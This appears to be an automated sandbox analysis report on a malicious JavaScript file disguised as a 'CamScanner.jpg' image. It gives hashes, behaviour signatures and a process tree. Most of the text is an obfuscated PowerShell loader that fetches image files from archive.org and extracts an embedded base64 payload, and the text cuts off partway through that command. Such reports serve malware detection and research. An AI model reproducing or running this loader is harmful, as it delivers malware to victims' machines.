Analysis

  • max time kernel
    17s
  • max time network
    18s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    02-08-2024 12:21

General

  • Target

    CamScanner.jpg.js

  • Size

    337KB

  • MD5

    03075353ad7a408cdadc3a28afaf47c0

  • SHA1

    31af045eaf01e0006a62f3fa2ae6a0244ad1a37c

  • SHA256

    9738532e30fdd2a36d900eff8a42aa1aa03c9cd328d27da75997976bff647401

  • SHA512

    0d197c5798a8a7d04583f7d3bfe1fb4e67e546aaf89d0da879c79d5b4735d6a0af766b3da6afd59e894a20a26cfb21dbfb5eb1be6bc063b90c9118bb36c58778

  • SSDEEP

    768:ZpUOaxGQG8GQGUD1Chty8vzR+0KFiRIxrAwKwN1Sy1h1l1La138V7DnzBhBLszZI:U2XsQ/Cz+rGS5DUtE1vk

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\CamScanner.jpg.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2524
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'ZgB1♺ ⠰ ℁ ⇝ ⾽G4♺ ⠰ ℁ ⇝ ⾽YwB0♺ ⠰ ℁ ⇝ ⾽Gk♺ ⠰ ℁ ⇝ ⾽bwBu♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽R♺ ⠰ ℁ ⇝ ⾽Bv♺ ⠰ ℁ ⇝ ⾽Hc♺ ⠰ ℁ ⇝ ⾽bgBs♺ ⠰ ℁ ⇝ ⾽G8♺ ⠰ ℁ ⇝ ⾽YQBk♺ ⠰ ℁ ⇝ ⾽EQ♺ ⠰ ℁ ⇝ ⾽YQB0♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽RgBy♺ ⠰ ℁ ⇝ ⾽G8♺ ⠰ ℁ ⇝ ⾽bQBM♺ ⠰ ℁ ⇝ ⾽Gk♺ ⠰ ℁ ⇝ ⾽bgBr♺ ⠰ ℁ ⇝ ⾽HM♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽B7♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽c♺ ⠰ ℁ ⇝ ⾽Bh♺ ⠰ ℁ ⇝ ⾽HI♺ ⠰ ℁ ⇝ ⾽YQBt♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽K♺ ⠰ ℁ ⇝ ⾽Bb♺ ⠰ ℁ ⇝ ⾽HM♺ ⠰ ℁ ⇝ ⾽d♺ ⠰ ℁ ⇝ ⾽By♺ ⠰ ℁ ⇝ ⾽Gk♺ ⠰ ℁ ⇝ ⾽bgBn♺ ⠰ ℁ ⇝ ⾽Fs♺ ⠰ ℁ ⇝ ⾽XQBd♺ ⠰ ℁ ⇝ ⾽CQ♺ ⠰ ℁ ⇝ ⾽b♺ ⠰ ℁ ⇝ ⾽Bp♺ ⠰ ℁ ⇝ ⾽G4♺ ⠰ ℁ ⇝ ⾽awBz♺ ⠰ ℁ ⇝ ⾽Ck♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽k♺ ⠰ ℁ ⇝ ⾽Hc♺ ⠰ ℁ ⇝ ⾽ZQBi♺ ⠰ ℁ ⇝ ⾽EM♺ ⠰ ℁ ⇝ ⾽b♺ ⠰ ℁ ⇝ ⾽Bp♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽bgB0♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽PQ♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽E4♺ ⠰ ℁ ⇝ ⾽ZQB3♺ ⠰ ℁ ⇝ ⾽C0♺ ⠰ ℁ ⇝ ⾽TwBi♺ ⠰ ℁ ⇝ ⾽Go♺ ⠰ ℁ ⇝ ⾽ZQBj♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽BT♺ ⠰ ℁ ⇝ ⾽Hk♺ ⠰ ℁ ⇝ ⾽cwB0♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽bQ♺ ⠰ ℁ ⇝ ⾽u♺ ⠰ ℁ ⇝ ⾽E4♺ ⠰ ℁ ⇝ ⾽ZQB0♺ ⠰ ℁ ⇝ ⾽C4♺ ⠰ ℁ ⇝ ⾽VwBl♺ ⠰ ℁ ⇝ ⾽GI♺ ⠰ ℁ ⇝ ⾽QwBs♺ ⠰ ℁ ⇝ ⾽Gk♺ ⠰ ℁ ⇝ ⾽ZQBu♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽Ow♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽CQ♺ ⠰ ℁ ⇝ ⾽Z♺ ⠰ ℁ ⇝ ⾽Bv♺ ⠰ ℁ ⇝ ⾽Hc♺ ⠰ ℁ ⇝ ⾽bgBs♺ ⠰ ℁ ⇝ ⾽G8♺ ⠰ ℁ ⇝ ⾽YQBk♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽Z♺ ⠰ ℁ ⇝ ⾽BE♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽d♺ ⠰ ℁ ⇝ ⾽Bh♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽PQ♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽E♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽K♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽p♺ ⠰ ℁ ⇝ ⾽Ds♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽k♺ ⠰ ℁ ⇝ ⾽HM♺ ⠰ ℁ ⇝ ⾽a♺ ⠰ ℁ ⇝ ⾽B1♺ ⠰ ℁ ⇝ ⾽GY♺ ⠰ ℁ ⇝ ⾽ZgBs♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽Z♺ ⠰ ℁ ⇝ ⾽BM♺ ⠰ ℁ ⇝ ⾽Gk♺ ⠰ ℁ ⇝ ⾽bgBr♺ ⠰ ℁ ⇝ ⾽HM♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽9♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽J♺ ⠰ ℁ ⇝ ⾽Bs♺ ⠰ ℁ ⇝ ⾽Gk♺ ⠰ ℁ ⇝ ⾽bgBr♺ ⠰ ℁ ⇝ ⾽HM♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽B8♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽RwBl♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽LQBS♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽bgBk♺ ⠰ ℁ ⇝ ⾽G8♺ ⠰ ℁ ⇝ ⾽bQ♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽C0♺ ⠰ ℁ ⇝ ⾽QwBv♺ ⠰ ℁ ⇝ ⾽HU♺ ⠰ ℁ ⇝ ⾽bgB0♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽J♺ ⠰ ℁ ⇝ ⾽Bs♺ ⠰ ℁ ⇝ ⾽Gk♺ ⠰ ℁ ⇝ ⾽bgBr♺ ⠰ ℁ ⇝ ⾽HM♺ ⠰ ℁ ⇝ ⾽LgBM♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽bgBn♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽a♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽7♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽ZgBv♺ ⠰ ℁ ⇝ ⾽HI♺ ⠰ ℁ ⇝ ⾽ZQBh♺ ⠰ ℁ ⇝ ⾽GM♺ ⠰ ℁ ⇝ ⾽a♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽Cg♺ ⠰ ℁ ⇝ ⾽J♺ ⠰ ℁ ⇝ ⾽Bs♺ ⠰ ℁ ⇝ ⾽Gk♺ ⠰ ℁ ⇝ ⾽bgBr♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽aQBu♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽J♺ ⠰ ℁ ⇝ ⾽Bz♺ ⠰ ℁ ⇝ ⾽Gg♺ ⠰ ℁ ⇝ ⾽dQBm♺ ⠰ ℁ ⇝ ⾽GY♺ ⠰ ℁ ⇝ ⾽b♺ ⠰ ℁ ⇝ ⾽Bl♺ ⠰ ℁ ⇝ ⾽GQ♺ ⠰ ℁ ⇝ ⾽T♺ ⠰ ℁ ⇝ ⾽Bp♺ ⠰ ℁ ⇝ ⾽G4♺ ⠰ ℁ ⇝ ⾽awBz♺ ⠰ ℁ ⇝ ⾽Ck♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽B7♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽d♺ ⠰ ℁ ⇝ ⾽By♺ ⠰ ℁ ⇝ ⾽Hk♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽B7♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽J♺ ⠰ ℁ ⇝ ⾽Bk♺ ⠰ ℁ ⇝ ⾽G8♺ ⠰ ℁ ⇝ ⾽dwBu♺ ⠰ ℁ ⇝ ⾽Gw♺ ⠰ ℁ ⇝ ⾽bwBh♺ ⠰ ℁ ⇝ ⾽GQ♺ ⠰ ℁ ⇝ ⾽ZQBk♺ ⠰ ℁ ⇝ ⾽EQ♺ ⠰ ℁ ⇝ ⾽YQB0♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽r♺ ⠰ ℁ ⇝ ⾽D0♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽k♺ ⠰ ℁ ⇝ ⾽Hc♺ ⠰ ℁ ⇝ ⾽ZQBi♺ ⠰ ℁ ⇝ ⾽EM♺ ⠰ ℁ ⇝ ⾽b♺ ⠰ ℁ ⇝ ⾽Bp♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽bgB0♺ ⠰ ℁ ⇝ ⾽C4♺ ⠰ ℁ ⇝ ⾽R♺ ⠰ ℁ ⇝ ⾽Bv♺ ⠰ ℁ ⇝ ⾽Hc♺ ⠰ ℁ ⇝ ⾽bgBs♺ ⠰ ℁ ⇝ ⾽G8♺ ⠰ ℁ ⇝ ⾽YQBk♺ ⠰ ℁ ⇝ ⾽EQ♺ ⠰ ℁ ⇝ ⾽YQB0♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽K♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽k♺ ⠰ ℁ ⇝ ⾽Gw♺ ⠰ ℁ ⇝ ⾽aQBu♺ ⠰ ℁ ⇝ ⾽Gs♺ ⠰ ℁ ⇝ ⾽KQ♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽H0♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽Bj♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽d♺ ⠰ ℁ ⇝ ⾽Bj♺ ⠰ ℁ ⇝ ⾽Gg♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽B7♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽YwBv♺ ⠰ ℁ ⇝ ⾽G4♺ ⠰ ℁ ⇝ ⾽d♺ ⠰ ℁ ⇝ ⾽Bp♺ ⠰ ℁ ⇝ ⾽G4♺ ⠰ ℁ ⇝ ⾽dQBl♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽fQ♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽H0♺ ⠰ ℁ ⇝ ⾽Ow♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽HI♺ ⠰ ℁ ⇝ ⾽ZQB0♺ ⠰ ℁ ⇝ ⾽HU♺ ⠰ ℁ ⇝ ⾽cgBu♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽J♺ ⠰ ℁ ⇝ ⾽Bk♺ ⠰ ℁ ⇝ ⾽G8♺ ⠰ ℁ ⇝ ⾽dwBu♺ ⠰ ℁ ⇝ ⾽Gw♺ ⠰ ℁ ⇝ ⾽bwBh♺ ⠰ ℁ ⇝ ⾽GQ♺ ⠰ ℁ ⇝ ⾽ZQBk♺ ⠰ ℁ ⇝ ⾽EQ♺ ⠰ ℁ ⇝ ⾽YQB0♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽B9♺ ⠰ ℁ ⇝ ⾽Ds♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽k♺ ⠰ ℁ ⇝ ⾽Gw♺ ⠰ ℁ ⇝ ⾽aQBu♺ ⠰ ℁ ⇝ ⾽Gs♺ ⠰ ℁ ⇝ ⾽cw♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽D0♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽B♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽Cg♺ ⠰ ℁ ⇝ ⾽JwBo♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽d♺ ⠰ ℁ ⇝ ⾽Bw♺ ⠰ ℁ ⇝ ⾽HM♺ ⠰ ℁ ⇝ ⾽Og♺ ⠰ ℁ ⇝ ⾽v♺ ⠰ ℁ ⇝ ⾽C8♺ ⠰ ℁ ⇝ ⾽YQBy♺ ⠰ ℁ ⇝ ⾽GM♺ ⠰ ℁ ⇝ ⾽a♺ ⠰ ℁ ⇝ ⾽Bp♺ ⠰ ℁ ⇝ ⾽HY♺ ⠰ ℁ ⇝ ⾽ZQ♺ ⠰ ℁ ⇝ ⾽u♺ ⠰ ℁ ⇝ ⾽G8♺ ⠰ ℁ ⇝ ⾽cgBn♺ ⠰ ℁ ⇝ ⾽C8♺ ⠰ ℁ ⇝ ⾽Z♺ ⠰ ℁ ⇝ ⾽Bv♺ ⠰ ℁ ⇝ ⾽Hc♺ ⠰ ℁ ⇝ ⾽bgBs♺ ⠰ ℁ ⇝ ⾽G8♺ ⠰ ℁ ⇝ ⾽YQBk♺ ⠰ ℁ ⇝ ⾽C8♺ ⠰ ℁ ⇝ ⾽bgBh♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽aQB2♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽ZQ♺ ⠰ ℁ ⇝ ⾽v♺ ⠰ ℁ ⇝ ⾽G4♺ ⠰ ℁ ⇝ ⾽YQB0♺ ⠰ ℁ ⇝ ⾽Gk♺ ⠰ ℁ ⇝ ⾽dgBl♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽LgBq♺ ⠰ ℁ ⇝ ⾽H♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽Zw♺ ⠰ ℁ ⇝ ⾽n♺ ⠰ ℁ ⇝ ⾽Cw♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽n♺ ⠰ ℁ ⇝ ⾽Gg♺ ⠰ ℁ ⇝ ⾽d♺ ⠰ ℁ ⇝ ⾽B0♺ ⠰ ℁ ⇝ ⾽H♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽cw♺ ⠰ ℁ ⇝ ⾽6♺ ⠰ ℁ ⇝ ⾽C8♺ ⠰ ℁ ⇝ ⾽LwBh♺ ⠰ ℁ ⇝ ⾽HI♺ ⠰ ℁ ⇝ ⾽YwBo♺ ⠰ ℁ ⇝ ⾽Gk♺ ⠰ ℁ ⇝ ⾽dgBl♺ ⠰ ℁ ⇝ ⾽C4♺ ⠰ ℁ ⇝ ⾽bwBy♺ ⠰ ℁ ⇝ ⾽Gc♺ ⠰ ℁ ⇝ ⾽LwBk♺ ⠰ ℁ ⇝ ⾽G8♺ ⠰ ℁ ⇝ ⾽dwBu♺ ⠰ ℁ ⇝ ⾽Gw♺ ⠰ ℁ ⇝ ⾽bwBh♺ ⠰ ℁ ⇝ ⾽GQ♺ ⠰ ℁ ⇝ ⾽LwBu♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽d♺ ⠰ ℁ ⇝ ⾽Bp♺ ⠰ ℁ ⇝ ⾽HY♺ ⠰ ℁ ⇝ ⾽ZQBl♺ ⠰ ℁ ⇝ ⾽C8♺ ⠰ ℁ ⇝ ⾽bgBh♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽aQB2♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽ZQ♺ ⠰ ℁ ⇝ ⾽u♺ ⠰ ℁ ⇝ ⾽Go♺ ⠰ ℁ ⇝ ⾽c♺ ⠰ ℁ ⇝ ⾽Bn♺ ⠰ ℁ ⇝ ⾽Cc♺ ⠰ ℁ ⇝ ⾽KQ♺ ⠰ ℁ ⇝ ⾽7♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽J♺ ⠰ ℁ ⇝ ⾽Bp♺ ⠰ ℁ ⇝ ⾽G0♺ ⠰ ℁ ⇝ ⾽YQBn♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽QgB5♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽ZQBz♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽PQ♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽EQ♺ ⠰ ℁ ⇝ ⾽bwB3♺ ⠰ ℁ ⇝ ⾽G4♺ ⠰ ℁ ⇝ ⾽b♺ ⠰ ℁ ⇝ ⾽Bv♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽Z♺ ⠰ ℁ ⇝ ⾽BE♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽d♺ ⠰ ℁ ⇝ ⾽Bh♺ ⠰ ℁ ⇝ ⾽EY♺ ⠰ ℁ ⇝ ⾽cgBv♺ ⠰ ℁ ⇝ ⾽G0♺ ⠰ ℁ ⇝ ⾽T♺ ⠰ ℁ ⇝ ⾽Bp♺ ⠰ ℁ ⇝ ⾽G4♺ ⠰ ℁ ⇝ ⾽awBz♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽J♺ ⠰ ℁ ⇝ ⾽Bs♺ ⠰ ℁ ⇝ ⾽Gk♺ ⠰ ℁ ⇝ ⾽bgBr♺ ⠰ ℁ ⇝ ⾽HM♺ ⠰ ℁ ⇝ ⾽Ow♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽Gk♺ ⠰ ℁ ⇝ ⾽Zg♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽Cg♺ ⠰ ℁ ⇝ ⾽J♺ ⠰ ℁ ⇝ ⾽Bp♺ ⠰ ℁ ⇝ ⾽G0♺ ⠰ ℁ ⇝ ⾽YQBn♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽QgB5♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽ZQBz♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽LQBu♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽k♺ ⠰ ℁ ⇝ ⾽G4♺ ⠰ ℁ ⇝ ⾽dQBs♺ ⠰ ℁ ⇝ ⾽Gw♺ ⠰ ℁ ⇝ ⾽KQ♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽Hs♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽k♺ ⠰ ℁ ⇝ ⾽Gk♺ ⠰ ℁ ⇝ ⾽bQBh♺ ⠰ ℁ ⇝ ⾽Gc♺ ⠰ ℁ ⇝ ⾽ZQBU♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽e♺ ⠰ ℁ ⇝ ⾽B0♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽PQ♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽Fs♺ ⠰ ℁ ⇝ ⾽UwB5♺ ⠰ ℁ ⇝ ⾽HM♺ ⠰ ℁ ⇝ ⾽d♺ ⠰ ℁ ⇝ ⾽Bl♺ ⠰ ℁ ⇝ ⾽G0♺ ⠰ ℁ ⇝ ⾽LgBU♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽e♺ ⠰ ℁ ⇝ ⾽B0♺ ⠰ ℁ ⇝ ⾽C4♺ ⠰ ℁ ⇝ ⾽RQBu♺ ⠰ ℁ ⇝ ⾽GM♺ ⠰ ℁ ⇝ ⾽bwBk♺ ⠰ ℁ ⇝ ⾽Gk♺ ⠰ ℁ ⇝ ⾽bgBn♺ ⠰ ℁ ⇝ ⾽F0♺ ⠰ ℁ ⇝ ⾽Og♺ ⠰ ℁ ⇝ ⾽6♺ ⠰ ℁ ⇝ ⾽FU♺ ⠰ ℁ ⇝ ⾽V♺ ⠰ ℁ ⇝ ⾽BG♺ ⠰ ℁ ⇝ ⾽Dg♺ ⠰ ℁ ⇝ ⾽LgBH♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽d♺ ⠰ ℁ ⇝ ⾽BT♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽cgBp♺ ⠰ ℁ ⇝ ⾽G4♺ ⠰ ℁ ⇝ ⾽Zw♺ ⠰ ℁ ⇝ ⾽o♺ ⠰ ℁ ⇝ ⾽CQ♺ ⠰ ℁ ⇝ ⾽aQBt♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽ZwBl♺ ⠰ ℁ ⇝ ⾽EI♺ ⠰ ℁ ⇝ ⾽eQB0♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽cw♺ ⠰ ℁ ⇝ ⾽p♺ ⠰ ℁ ⇝ ⾽Ds♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽k♺ ⠰ ℁ ⇝ ⾽HM♺ ⠰ ℁ ⇝ ⾽d♺ ⠰ ℁ ⇝ ⾽Bh♺ ⠰ ℁ ⇝ ⾽HI♺ ⠰ ℁ ⇝ ⾽d♺ ⠰ ℁ ⇝ ⾽BG♺ ⠰ ℁ ⇝ ⾽Gw♺ ⠰ ℁ ⇝ ⾽YQBn♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽PQ♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽Cc♺ ⠰ ℁ ⇝ ⾽P♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽8♺ ⠰ ℁ ⇝ ⾽EI♺ ⠰ ℁ ⇝ ⾽QQBT♺ ⠰ ℁ ⇝ ⾽EU♺ ⠰ ℁ ⇝ ⾽Ng♺ ⠰ ℁ ⇝ ⾽0♺ ⠰ ℁ ⇝ ⾽F8♺ ⠰ ℁ ⇝ ⾽UwBU♺ ⠰ ℁ ⇝ ⾽EE♺ ⠰ ℁ ⇝ ⾽UgBU♺ ⠰ ℁ ⇝ ⾽D4♺ ⠰ ℁ ⇝ ⾽Pg♺ ⠰ ℁ ⇝ ⾽n♺ ⠰ ℁ ⇝ ⾽Ds♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽k♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽bgBk♺ ⠰ ℁ ⇝ ⾽EY♺ ⠰ ℁ ⇝ ⾽b♺ ⠰ ℁ ⇝ ⾽Bh♺ ⠰ ℁ ⇝ ⾽Gc♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽9♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽Jw♺ ⠰ ℁ ⇝ ⾽8♺ ⠰ ℁ ⇝ ⾽Dw♺ ⠰ ℁ ⇝ ⾽QgBB♺ ⠰ ℁ ⇝ ⾽FM♺ ⠰ ℁ ⇝ ⾽RQ♺ ⠰ ℁ ⇝ ⾽2♺ ⠰ ℁ ⇝ ⾽DQ♺ ⠰ ℁ ⇝ ⾽XwBF♺ ⠰ ℁ ⇝ ⾽E4♺ ⠰ ℁ ⇝ ⾽R♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽+♺ ⠰ ℁ ⇝ ⾽D4♺ ⠰ ℁ ⇝ ⾽Jw♺ ⠰ ℁ ⇝ ⾽7♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽J♺ ⠰ ℁ ⇝ ⾽Bz♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽YQBy♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽SQBu♺ ⠰ ℁ ⇝ ⾽GQ♺ ⠰ ℁ ⇝ ⾽ZQB4♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽PQ♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽CQ♺ ⠰ ℁ ⇝ ⾽aQBt♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽ZwBl♺ ⠰ ℁ ⇝ ⾽FQ♺ ⠰ ℁ ⇝ ⾽ZQB4♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽LgBJ♺ ⠰ ℁ ⇝ ⾽G4♺ ⠰ ℁ ⇝ ⾽Z♺ ⠰ ℁ ⇝ ⾽Bl♺ ⠰ ℁ ⇝ ⾽Hg♺ ⠰ ℁ ⇝ ⾽TwBm♺ ⠰ ℁ ⇝ ⾽Cg♺ ⠰ ℁ ⇝ ⾽J♺ ⠰ ℁ ⇝ ⾽Bz♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ 